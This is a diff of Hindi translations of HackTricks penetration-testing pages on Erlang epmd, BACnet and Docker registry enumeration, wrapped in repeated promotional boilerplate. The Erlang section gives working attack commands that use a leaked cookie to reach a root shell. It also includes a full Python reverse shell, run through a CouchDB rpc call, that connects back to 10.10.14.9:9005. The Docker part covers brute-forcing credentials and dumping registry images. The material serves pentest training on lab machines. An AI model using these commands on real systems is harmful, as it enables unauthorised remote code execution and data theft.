फिर proxychains के साथ nmap चलाएं ताकि **स्थानीय से होस्ट को स्कैन करें**: `proxychains nmap -sT -n -p- localhost`
## SPOSE स्कैनर
@ -46,14 +48,14 @@ python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131
```
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपन हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज में.
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपन हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -1,32 +1,32 @@
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
# मूल जानकारी
erlang port mapper daemon का उपयोग वितरित erlang उदाहरणों को समन्वयित करने के लिए किया जाता है। इसका काम है **यह ट्रैक रखना कि कौन सा नोड नाम किस पते पर सुनता है**। इसलिए, epmd प्रतीकात्मक नोड नामों को मशीन पतों से मैप करता है।
**Erlang Port Mapper Daemon (epmd)** वितरित Erlang इंस्टेंसेज के लिए एक समन्वयक के रूप में कार्य करता है। यह प्रतीकात्मक नोड नामों को मशीन पतों से मैप करने के लिए जिम्मेदार है, मुख्य रूप से यह सुनिश्चित करता है कि प्रत्येक नोड नाम किसी विशिष्ट पते से संबंधित है। **epmd** की यह भूमिका विभिन्न Erlang नोडों के बीच नेटवर्क पर संवाद और संचार के लिए बिना किसी अडचन के संवाद के लिए महत्वपूर्ण है।
**डिफ़ॉल्ट पोर्ट**: 4369
```
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
```
यह डिफ़ॉल्ट रूप से RabbitMQ और CouchDB स्थापनाओं पर उपयोग किया जाता है।
Yah RabbitMQ aur CouchDB installations par default istemal hota hai.
# सूचीकरण
# Enumeration
## मैनुअल
## Manual
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
@ -51,11 +51,11 @@ PORT STATE SERVICE VERSION
| kazoo_apps: 11500
|_ kazoo-rabbitmq: 25672
```
# Erlang Cookie RCE
# Erlang कुकी RCE
## रिमोट कनेक्शन
यदि आप **Authentication cookie को लीक कर सकते हैं**, तो आप होस्ट पर कोड निष्पादित करने में सक्षम होंगे। आमतौर पर, यह कुकी `~/.erlang.cookie` में स्थित होती है और यह पहली बार शुरू होने पर erlang द्वारा जनरेट की जाती है। यदि इसे मैन्युअली संशोधित या सेट नहीं किया गया है, तो यह 20 अक्षरों की लंबाई का एक यादृच्छिक स्ट्रिंग \[A:Z] होता है।
अगर आप **प्रमाणीकरण कुकी लीक कर सकते हैं** तो आप मेजबान पर कोड को निष्पादित कर सकेंगे। सामान्यत: यह कुकी `~/.erlang.cookie` में स्थित होती है और पहली बार एरलैंग द्वारा उत्पन्न की जाती है। यदि यह संशोधित नहीं किया गया है या मैन्युअल रूप से सेट नहीं किया गया है तो यह एक यादृच्छिक स्ट्रिंग \[A:Z] है जिसकी लंबाई 20 वर्ण है।
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
@ -67,22 +67,22 @@ At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
अधिक जानकारी के लिए [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/) पर देखें।
अधिक जानकारी [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/) में उपलब्ध है।\
लेखक ने कुकी को ब्रूटफोर्स करने के लिए एक प्रोग्राम भी साझा किया है:
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
## स्थानीय कनेक्शन
इस मामले में हम CouchDB का उपयोग करके स्थानीय रूप से विशेषाधिकार बढ़ाने का दुरुपयोग करेंगे:
इस मामले में हम स्थानीय रूप से वर्चस्व बढ़ाने के लिए CouchDB का दुरुपयोग करेंगे:
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
उदाहरण [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution) से लिया गया है\
आप **Canape HTB मशीन का उपयोग करके** इस कमजोरी का **शोषण करने** का **अभ्यास** कर सकते हैं
उदाहरण [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution) से लिया गया है\
आप **Canape HTB मशीन का उपयोग** कर सकते हैं इस वल्न का **शिकार करने** के लिए
## Metasploit
```bash
@ -96,14 +96,14 @@ msf5> use exploit/multi/misc/erlang_cookie_rce
<details>
<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की हमारी विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -1,35 +1,30 @@
```markdown
<details>
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपन हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपन हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
# प्रोटोकॉल जानकारी
# Protocol Information
**BACnet** एक [संचार प्रोटोकॉल](https://en.wikipedia.org/wiki/Communications_protocol) है जो बिल्डिंग ऑटोमेशन और कंट्रोल \(BAC\) नेटवर्क्स के लिए है जो [ASHRAE](https://en.wikipedia.org/wiki/ASHRAE), [ANSI](https://en.wikipedia.org/wiki/ANSI), और [ISO](https://en.wikipedia.org/wiki/International_Organization_for_Standardization) 16484-5 मानक[\[1\]](https://en.wikipedia.org/wiki/BACnet#cite_note-1) प्रोटोकॉल का उपयोग करते हैं।
BACnet को डिजाइन किया गया था ताकि [बिल्डिंग ऑटोमेशन](https://en.wikipedia.org/wiki/Building_automation) और कंट्रोल सिस्टम्स के संचार को सक्षम किया जा सके जैसे कि हीटिंग, वेंटिलेटिंग, और एयर-कंडीशनिंग कंट्रोल \([HVAC](https://en.wikipedia.org/wiki/HVAC)\), लाइटिंग कंट्रोल, एक्सेस कंट्रोल, और फायर डिटेक्शन सिस्टम्स और उनके संबंधित उपकरण। BACnet प्रोटोकॉल कंप्यूटरीकृत बिल्डिंग ऑटोमेशन उपकरणों को जानकारी का आदान-प्रदान करने के लिए तंत्र प्रदान करता है, चाहे वे किसी भी विशेष बिल्डिंग सेवा को प्रदर्शित करें।
[Wikipedia](https://en.wikipedia.org/wiki/BACnet) से
**BACnet** एक **संचार प्रोटोकॉल** है जो बिल्डिंग ऑटोमेशन और नियंत्रण (BAC) नेटवर्क के लिए **ASHRAE**, **ANSI**, और **ISO 16484-5 मानक** प्रोटोकॉल का उपयोग करता है। यह बिल्डिंग ऑटोमेशन और नियंत्रण सिस्टम के बीच संचार को सुविधाजनक बनाता है, जिससे HVAC नियंत्रण, प्रकाश नियंत्रण, पहुंच नियंत्रण, और अग्नि पहचान प्रणालियों जैसी अनुप्रयोगों के बीच जानकारी आदान-प्रदान हो सके। BACnet सुनिश्चित करता है और अनुप्रयोगों के विशेष सेवाओं के बावजूद कंप्यूटरीकृत बिल्डिंग ऑटोमेशन उपकरणों को संचार करने की अनुमति देता है।
**डिफ़ॉल्ट पोर्ट:** 47808
```
```text
PORT STATE SERVICE
47808/udp open BACNet -- Building Automation and Control NetworksEnumerate
```
# सूचीकरण
# जाँच
## मैनुअल
## मैन्युअल
```bash
pip3 install BAC0
import BAC0
@ -44,25 +39,9 @@ bacnet.vendorName.strValue
```bash
nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 <IP>
```
```markdown
यह स्क्रिप्ट BACnet नेटवर्क में एक विदेशी डिवाइस के रूप में शामिल होने का प्रयास नहीं करती है, यह केवल एक IP पते वाले डिवाइस को सीधे BACnet अनुरोध भेजती है।
यह स्क्रिप्ट एक बीएसीनेट नेटवर्क में एक विदेशी उपकरण के रूप में शामिल होने का प्रयास नहीं करता, बल्कि यह सीधे एक आईपी पते वाले उपकरण को बीएसीनेट अनुरोध भेजता है।
## Shodan
* `port:47808 instance`
* `"Instance ID" "Vendor Name"`
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
```

View file

@ -1,35 +1,31 @@
# 5000 - Docker Registry का पेंटेस्टिंग
# 5000 - पेंटेस्टिंग डॉकर रजिस्ट्री
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
## मूल जानकारी
**जानकारी** [**यहाँ से**](https://www.aquasec.com/cloud-native-academy/docker-container/docker-registry/#:\~:text=A%20Docker%20registry%20is%20a,versions%20of%20a%20specific%20image.)**.**
**डॉकर इमेजेस** के लिए एक **डॉकर रजिस्ट्री** नामक एक संग्रहण और वितरण प्रणाली है, जिन्हें टैग द्वारा पहचाना जा सकता है और वे कई संस्करणों में आ सकते हैं। ये इमेजेस **डॉकर रेपॉजिटरी** में संगठित होती हैं जो रजिस्ट्री में होती हैं, प्रत्येक रेपॉजिटरी एक विशिष्ट इमेज के विभिन्न संस्करणों को संग्रहित करती है। दी गई कार्यक्षमता इमेजेस को स्थानीय रूप से डाउनलोड करने या रजिस्ट्री में अपलोड करने की अनुमति देती है, यदि उपयोगकर्ता के पास आवश्यक अनुमतियाँ हैं।
**Docker registry** नामित Docker इमेजेज के लिए एक संग्रहण और वितरण प्रणाली है। एक ही इमेज के कई अलग-अलग संस्करण हो सकते हैं, जिन्हें उनके टैग्स द्वारा पहचाना जाता है।\
Docker registry **Docker repositories** में व्यवस्थित होती है, जहाँ एक रिपॉजिटरी में एक विशिष्ट इमेज के सभी संस्करण होते हैं। रजिस्ट्री Docker उपयोगकर्ताओं को स्थानीय रूप से इमेजेज को पुल करने की अनुमति देती है, साथ ही रजिस्ट्री में नई इमेजेज को पुश करने की भी (जब उपयुक्त पहुँच अनुमतियाँ हों तो)।
**DockerHub** डॉकर के लिए डिफ़ॉल्ट सार्वजनिक रजिस्ट्री के रूप में काम करता है, लेकिन उपयोगकर्ताओं को खुद का ऑन-प्रीमिस संस्करण चलाने का विकल्प भी है जो खुला स्रोत वाला डॉकर रजिस्ट्री/वितरण है या व्यावसायिक रूप से समर्थित **Docker Trusted Registry** के लिए चुन सकते हैं। इसके अतिरिक्त, विभिन्न अन्य सार्वजनिक रजिस्ट्रियाँ ऑनलाइन उपलब्ध हैं।
डिफ़ॉल्ट रूप से, Docker इंजन **DockerHub** के साथ बातचीत करता है, Docker का सार्वजनिक रजिस्ट्री उदाहरण। हालांकि, ओपन-सोर्स Docker registry/distribution को ऑन-प्रिमाइस चलाना संभव है, साथ ही एक वाणिज्यिक रूप से समर्थित संस्करण जिसे **Docker Trusted Registry** कहा जाता है। अन्य सार्वजनिक रजिस्ट्री ऑनलाइन उपलब्ध हैं।
ऑन-प्रिमाइस रजिस्ट्री से एक इमेज को पुल करने के लिए, आप इसी तरह का एक कमांड चला सकते हैं:
```
ऑन-प्रीमिस रजिस्ट्री से एक इमेज डाउनलोड करने के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
```bash
docker pull my-registry:9000/foo/bar:2.1
```
जहां आप `foo/bar` इमेज का `2.1` टैग वाला वर्जन हमारे ऑन-प्रिमाइस रजिस्ट्री से पुल करते हैं जो `my-registry` डोमेन, पोर्ट `9000` पर स्थित है।
यदि आपने DockerHub का इस्तेमाल किया होता, और 2.1 वहां का लेटेस्ट वर्जन भी होता, तो आप इसी इमेज को लोकली पुल करने के लिए यह कमांड चला सकते थे:
```
यह कमांड `my-registry` डोमेन पर पोर्ट `9000` पर स्थानीय रजिस्ट्री से `foo/bar` इमेज संस्करण `2.1` लाता है। उल्टे, यदि `2.1` नवीनतम संस्करण है, तो DockerHub से एक ही इमेज डाउनलोड करने के लिए कमांड सरल हो जाता है:
```bash
docker pull foo/bar
```
**डिफ़ॉल्ट पोर्ट:** 5000
@ -37,14 +33,14 @@ docker pull foo/bar
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
```
## खोज
## खोजना
इस सेवा को चलते हुए पता लगाने का सबसे आसान तरीका है nmap के आउटपुट में इसे प्राप्त करना। वैसे, ध्यान दें कि चूंकि यह एक HTTP आधारित सेवा है, यह HTTP प्रॉक्सी के पीछे हो सकती है और nmap इसे पता नहीं लगा पाएगा।
कुछ फिंगरप्रिंट्स:
इस सेवा को खोजने का सबसे आसान तरीका इसे nmap के आउटपुट पर पाना है। फिर भी, ध्यान दें कि यह एक HTTP आधारित सेवा है और यह HTTP प्रॉक्सी के पीछे हो सकता है और nmap इसे नहीं डिटेक्ट करेगा।\
कुछ fingerprints:
* यदि आप `/` पर एक्सेस करते हैं तो कुछ भी रिस्पॉन्स में वापस नहीं आता है
* यदि आप `/v2/` पर एक्सेस करते हैं तो `{}` वापस आता है
* यदि आप `/v2/_catalog` पर एक्सेस करते हैं तो आपको मिल सकता है:
* यदि आप `/` तक पहुँचते हैं तो प्रतिक्रिया में कुछ भी वापस नहीं आता है
* यदि आप `/v2/` तक पहुँचते हैं तो `{}` वापस आता है
* यदि आप `/v2/_catalog` तक पहुँचते हैं तो आपको मिल सकता है:
* `{"repositories":["alpine","ubuntu"]}`
* `{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}`
@ -52,7 +48,7 @@ PORT STATE SERVICE VERSION
### HTTP/HTTPS
Docker registry को **HTTP** या **HTTPS** का उपयोग करके कॉन्फ़िगर किया जा सकता है। इसलिए पहली बात जो आपको करनी चाहिए वह है **पता लगाना कि कौन सा** कॉन्फ़िगर किया गया है:
डॉकर रजिस्ट्री को **HTTP** या **HTTPS** का उपयोग करने के लिए कॉन्फ़िगर किया जा सकता है। इसलिए पहली चीज जो आपको करनी होगी वह यह है कि **कौन सा** कॉन्फ़िगर किया गया है:
```bash
curl -s http://10.10.10.10:5000/v2/_catalog
#If HTTPS
@ -65,7 +61,7 @@ Warning: <FILE>" to save to a file.
```
### प्रमाणीकरण
Docker registry को **प्रमाणीकरण** की आवश्यकता हो सकती है:
डॉकर रजिस्ट्री को **प्रमाणीकरण** की आवश्यकता हो सकती है:
```bash
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
@ -73,14 +69,14 @@ curl -k https://192.25.197.3:5000/v2/_catalog
#If no authentication required
{"repositories":["alpine","ubuntu"]}
```
यदि Docker Registry में प्रमाणीकरण की आवश्यकता हो तो आप [**इसका उपयोग करके इसे ब्रूट फोर्स करने का प्रयास कर सकते हैं**](../generic-methodologies-and-resources/brute-force.md#docker-registry).\
**यदि आप मान्य क्रेडेंशियल्स पाते हैं तो आपको उनका उपयोग करके रजिस्ट्री का अनुक्रमण करना होगा**, `curl` में आप उन्हें इस प्रकार उपयोग कर सकते हैं:
यदि Docker रजिस्ट्री प्रमाणीकरण की आवश्यकता है तो आप इसका ब्रूट फोर्स प्रयास कर सकते हैं [**इसका उपयोग करके**](../generic-methodologies-and-resources/brute-force.md#docker-registry)।\
**यदि आप मान्य प्रमाण पत्र पाते हैं तो आपको उन्हें उपयोग करना होगा** रजिस्ट्री की जांच करने के लिए, `curl` में आप इस तरह से उन्हें उपयोग कर सकते हैं:
```bash
curl -k -u username:password https://10.10.10.10:5000/v2/_catalog
```
### DockerRegistryGrabber का उपयोग करके Enumeration
### DockerRegistryGrabber का उपयोग करके जांच
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) एक python टूल है जिसका उपयोग docker registry का enumeration / dump करने के लिए किया जाता है (बिना या बेसिक प्रमाणीकरण के साथ)
[DockerRegistryGrabber](https://github.com/Syzik/DockerRegistryGrabber) एक पायथन उपकरण है जो डॉकर रजिस्ट्री को जांचने/डंप करने के लिए है (बिना या मूल अधिकृतता के)।
```bash
python3 DockerGraber.py http://127.0.0.1 --list
@ -117,9 +113,9 @@ python3 DockerGraber.py http://127.0.0.1 --dump my-ubuntu
[+] Downloading : c1de0f9cdfc1f9f595acd2ea8724ea92a509d64a6936f0e645c65b504e7e4bc6
[+] Downloading : 4007a89234b4f56c03e6831dc220550d2e5fba935d9f5f5bcea64857ac4f4888
```
### curl का उपयोग करके Enumeration
### curl का उपयोग करके जांच
एक बार जब आप **docker registry तक पहुँच प्राप्त कर लेते हैं**, तो यहाँ कुछ आदेश हैं जिनका उपयोग आप इसका enumeration करने के लिए कर सकते हैं:
एक बार जब आपने **डॉकर रजिस्ट्री तक पहुंच जाते हैं** तो यहां कुछ कमांड हैं जिनका उपयोग आप इसकी जांच के लिए कर सकते हैं:
```bash
#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
@ -183,10 +179,10 @@ curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fa
tar -xf blob1.tar #After this,inspect the new folders and files created in the current directory
```
{% hint style="warning" %}
